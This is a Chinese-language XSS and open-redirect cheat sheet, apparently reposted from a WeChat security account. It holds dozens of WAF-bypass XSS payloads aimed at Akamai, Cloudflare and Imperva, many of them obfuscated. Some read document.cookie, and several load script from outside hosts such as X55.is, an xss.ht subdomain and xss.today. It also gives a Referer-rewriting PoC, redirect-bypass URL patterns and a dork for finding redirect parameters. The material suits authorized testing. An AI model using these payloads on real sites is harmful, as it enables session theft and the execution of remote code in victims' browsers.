XSS
-
测试不同编码方式并检查是否存在任何奇怪的行为 -
<"'`--!> -
如果输入的 < 被反射为 %3c（即被 URL 编码了一次），则测试双重编码（如 %253c）-
https://github.com/InfoSecOne/ghettoBypass -
https://github.com/masatokinugawa/filterbypass/wiki/Browser%27s-XSS-Filter-Bypass-Cheat-Sheet -
逆向工程开发者的思维
CSP
-
CSP审查工具
1. %3C/script%20%3E
2. mitsecXSS%22%3E%3Cinput%20%00%20onControl%20hello%20oninput=confirm(1)%20x%3E
3. "><img src onerror=document.body.appendChild(Object.assign(document.createElement('script'),{src:'https:'.concat(String.fromCharCode(47)).concat(String.fromCharCode(47)).concat('externaljshere')}));>
4.
Waf（注意：下文多条 payload 会从第三方域加载或执行脚本，如 import('//X55.is')、atob 解码后指向 *.xss.ht 的 script src；实测时应替换为自己控制的域，否则执行的是他人的代码）
Akamai JSi
';k='e'%0Atop['al'+k+'rt'](1)//
'"><A HRef=" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
CloudFlare HTMLi
<Img Src=OnXSS OnError=alert(1)>
<Img Src=OnXSS OnError=confirm(document.cookie)>
Imperva HTMLi
<Img Src=//X55.is OnLoad%0C=import(Src)>
工具和资源
-
cheat-sheet -
Dom-xss-burp
Referer xss
-
利用 window.history.replaceState() 改写当前页面在历史记录中的 URL，从而改变后续请求发出的 Referer（仅能修改同源下的路径和查询串，不能伪造其他源） -
https://webhook.site/ -
CRLF
<body>
<!-- PoC for Referer forgery via history.replaceState(). The link below carries
     referrerpolicy="unsafe-url", so the browser sends the page's full current URL as
     the Referer; the script rewrites that URL before the user clicks.
     NOTE(review): replaceState() is same-origin only - it can change the path/query
     part of the Referer, never its scheme or host. Swap the href for a target you are
     authorized to test. -->
<a
href="https://www.marksandspencer.com.tr/cerez-politikasi?1111"
referrerpolicy="unsafe-url"
>
click me
</a>
<script>
// Replace the current history entry's URL with "1.html" (no navigation, no reload);
// a later click on the link sends a Referer ending in /1.html instead of the real path.
window.history.replaceState(null,"","1.html")
</script>
</body>
Url跳转
重定向过程中，目标 URL 可能在前端（window.location）或后端（服务端发起请求）被处理，对应下面两种利用思路
深度利用
-
window.location: 前端用 window.location 跳转到可控 URL 时，尝试 javascript: 伪协议寻找 XSS -
后端判定: 服务端会请求或校验目标 URL 时，寻找 SSRF
bypass
/xxx.com
//xxx.com
\xxx.com
//xxx.com
//domain.com@xxx.com（@ 之前是 userinfo，浏览器实际访问的是 xxx.com）
//xxx.com
https://xxx.com%2Fdomain.com
https://xxx.com%2523.domain.com
https://xxx.com?c=.domain.com (# 也可以)
//%2F/xxx.com
////xxx.com
https://domain.computer/
https://domain.com.xxx.com
/%0D/xxx.com(%09 , %00, %0a, %07, %2F)
/%5Cxxx.com
//google%E3%80%82com（%E3%80%82 为 U+3002 句号，IDNA 规范化后等价于 google.com）
& ? # /
google dork
inurl:url= | inurl:return= | inurl:return_url= | inurl:rUrl=| inurl:r_url= | inurl:next= | inurl:cancelUrl= | inurl:goto= | inurl:follow= | inurl:returnTo= | inurl:history= | inurl:redirect= | inurl:redirectTo= | inurl:redirectUrl= | inurl:goback= | inurl:redir= | inurl:redirUrl= | inurl:ret= | inurl:r2= | inurl:page= inurl:& inurl:http site:example.com
gospider
gospider -w -r -a -s https://www.xxx.com | grep -E "callback|%2F|redirect|url=|return|rurl|r_url|next|cancelUrl|goto|follow|returnto|history|goback|redir=|ret=|r2=|page=|jump=|target="
Waf xss payload
"><img/src/onerror=import('//domain/')>"@yourdomain
013371337;ext=<img/src/onerror=import('//domain/')>
<Svg Only=1 OnLoad=confirm(document.domain)>
<Svg/OnLoad=alert(1337)>"@gmail.com
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
<svg onload=alert(document.cookie)>
<svg onload=alert("1")><””>
<Img Src=//X55.is OnLoad%0C=import(Src)>
%3csvg/onload=window%5b"al"+"ert"%5d`1337`%3e
%3Csvg%20onload=alert(%22MrHex88%22)%3E
%3Cimg%20src=x%20onerror=alert(%22MrHex88%22)%3E
"><svg onmouseover="confirm(document.domain)
<Img Src=OnXSS OnError=confirm(1337)>
'%3e%3cscript%3ealert(5*5)%3c%2fscript%3eejj4sbx5w4o
javascript:var a="ale";var b="rt";var c="()";decodeURI("<button popovertarget=x>Click me</button><hvita onbeforetoggle="+a+b+c+" popover id=x>Hvita</hvita>")
<a/href="javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">ClickMe
<Script>window.valueOf=alert;window%2B1</Script>
<svg/onload=location=location.hash.substr(1)>#javascript:alert(1)
"><form onformdata%3Dwindow.confirm(cookie)><button>XSS here<!--
1%22onfocus=%27alert%28document.cookie%29%27%20autofocus=
1%22onfocus=%27window.alert%28document.cookie%29%27%20autofocus=
"><𝘀𝘃𝗴+𝗼𝗻𝗹𝗼𝗮𝗱=𝗰𝗼𝗻𝗳𝗶𝗿𝗺(𝗰𝗼𝗼𝗸𝗶𝗲)>
- 1'"();<test><ScRiPt >window.alert("XSS_WAF_BYPASS")
'"><img src=x onerror=alert("xss!")>.pdf
"><input%252bTyPE%25253d"hxlxmj"%252bSTyLe%25253d"display%25253anone%25253b"%252bonfocus%25253d"this.style.display%25253d'block'%25253b%252bthis.onfocus%25253dnull%25253b"%252boNMoUseOVer%25253d"this['onmo'%25252b'useover']%25253dnull%25253beval(String.fromCharCode(99,111,110,102,105,114,109,40,100,111,99,117,109,101,110,116,46,100,111,109,97,105,110,41))%25253b"%252bAuToFOcus>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
"><track/onerror='confirm%601%60'>
"><track/onerror='confirm`1`'>
%3Cdiv%20id%3D%22load%22%3E%3C%2Fdiv%3E%3Cscript%3Evar%20i%20%3D%20document.createElement%28%27iframe%27%29%3B%20i.style.display%20%3D%20%27none%27%3B%20i.onload%20%3D%20function%28%29%20%7B%20i.contentWindow.location.href%20%3D%20%27%2F%2Fxss.today%27%3B%20%7D%3B%20document.getElementById%28%27load%27%29.appendChild%28i%29%3B%3C%2Fscript%3E
<vIdeO><sourCe onerror="['al\u0065'+'rt'][0]['\x63onstructor']['\x63onstructor']('return this')()[['al\u0065'+'rt'][0]]([String.fromCharCode(8238)+[!+[]+!+[]]+[![]+[]][+[]]])">
<video><source onerror="alert.constructor.constructor('return this')().alert('0f')">
<a href="#" id="uniqueLink">Click me</a> <script> (function() { var a = ['\x6F\x70\x65\x6E', '\x77\x72\x69\x74\x65', '\x63\x6C\x6F\x73\x65', '\x70\x72\x69\x6E\x74', '\x61\x6C\x65\x72\x74']; var b = ['@', 'h', 'x', 'l', 'x', 'm', 'j']; var c = ['B', '1', 'P', '4', '$', '$']; document.getElementById('uniqueLink').onclick = function() { var w = window[a[0]](); w.document[a[1]](b.join('')); w.document[a[2]](); w[a[3]](); window[a[4]](c.join('')); }; })(); </script>
<sCrIpT>(function(){var a=[97,108,101,114,116];var
b=String.fromCharCode.apply(null,a);var c=[88,115,112,108,111,105,116];var d=String.fromCharCode.apply(null,c);window[b](d);})()</sCrIpT>
<DiV sTylE="WidTH:100%;HeIgHt:100vH;" oNpOINteROvEr="var _0x1abc=['\x63','\x6F','\x6E','\x73','\x74','\x72','\x75','\x63','\x74','\x6F','\x72'];var _0x2bcd=['\x61','\x6C','\x65','\x72','\x74','\x28','\x64','\x6F','\x63','\x75','\x6D','\x65','\x6E','\x74','\x2E','\x64','\x6F','\x6D','\x61','\x69','\x6E','\x29'];[][_0x1abc.join('')][_0x1abc.join('')](_0x2bcd.join(''))((97^0)===97?1:0);"></dIV>
<div style="width:100%;height:100vh;" onpointerover="[][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')][decodeURIComponent('%63%6F%6E%73%74%72%75%63%74%6F%72')](decodeURIComponent('%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%64%6F%6D%61%69%6E%29'))()"> </div>
<div onpointerover="javascript:eval(decodeURIComponent(String.fromCharCode(97, 108, 101, 114, 116, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 100, 111, 109, 97, 105, 110, 41)))" style="width:100%;height:100vh;"></div>
<div onpointerover="javascript:alert(document.domain)" style="width:100%;height:100vh;"></div>
<svg onload=(function(){let arr=[41,49,40,116,114,101,108,97].reverse().map(e=>String.fromCharCode(e));let func=new Function(...arr);func();})()>
<svg onload="alert(1)"></svg>
jaVasCript:/*-/*`/*`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/(/*%252f%252a*/*┯┪prompt(1)┯┻/**/;eval(atob('YWxlcnQoIkhpISIp'))//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%0d%0a//%0D%0A%252f%252a*/)//
<select><noembed></select><script x='a@b'a> y='a@b'//a@b%0a\u0061lert('CYBERTIX')</script x>
<EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>
<BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>
"'`><\x3Cimg src=xxx:x onerror=javascript:alert(1)>
<math><x xlink:href=javascript:confirm`1`>click
<script /*%00*/>/*%00*/alert(1)/*%00*/</script /*%00*/
<svg onload=alert(document.cookie)>
JavaScript://%250Aalert?.(1)//
'/*'/*"/*"/*`/*`/*%26apos;)/*<!-->
</Title/</Style/</Script/</textArea/</iFrame/</noScript>
74k<K/contentEditable/autoFocus/OnFocus=
/*${/*/;{/**/(alert)(1)}//><Base/Href=//google.com76-->
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%230000000000000000041//
xss'"><iframe srcdoc='%26lt;script>;alert(1)%26lt;/script>'>
javascript:%ef%bb%bfalert(XSS)
<input accesskey=X onclick="self['wind'+'ow']['one'+'rror']=alert;throw 1337;">
<svg onload="[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\141\154\145\162\164\50\61\51')()">
"><video><source onerror=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYXlkaW5ueXVudXMueHNzLmh0Ijtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw==>
"><track/onerror='confirm%601%60'>
<svg><use href="data:image/svg+xml;base64,PHN2ZyBpZD0neCcgeG1sbnM9J2h0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnJyB4bWxuczp4bGluaz0naHR0cDovL3d3dy53My5vcmcvMTk5OS94bGluaycgd2lkdGg9JzEwMCcgaGVpZ2h0PScxMDAnPgo8aW1hZ2UgaHJlZj0iMSIgb25lcnJvcj0iYWxlcnQoMSkiIC8+Cjwvc3ZnPg==hashtag#x" /></svg>
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
<img/src=x onError="`${x}`;alert(`Hello`);">
"`'><script>\xE2\x80\x87javascript:alert(1)</script>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
"/><img%20s+src+c=x%20on+onerror+%20="alert(1)">
"><track/onerror='confirm%601%60'>
<svg/onload=location='javas'%2B'cript:'%2B
'ale'%2B'rt'%2Blocation.hash.substr(1)>#(1)
<svg/onload=location=/javas/.source%2B/cript:/.source%2B
/ale/.source%2B/rt/.source%2Blocation.hash.substr(1)>#(1)
"'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
<SCRIPT>location=%27javasCript:alert\x281\x29%27</SCRIPT>
';k='e'%0Atop['al'+k+'rt'](1)//
"';k='e'%0Atop['al'+k+'rt'](1)//"
<Img Src=//X55.is OnLoad%0C=import(Src)>
<img/src/onerror=alert/1337/(1)>
<img/src/onerror=alert//
(2)>
<img/src/onerror=alert//(3)>
'"/><script%20>alert(document.domain)<%2fscript>.css
<iframe srcdoc="<img src=x onerror=alert(999)>"></iframe>
/path?next=javascript:top[/al/.source+/ert/.source](document.cookie)
login?redirectUrl=javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.domain
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc(VulneravelXSS%26%2300000000000000000041//
原文始发于微信公众号(白安全组):XSS挖掘工具资源分享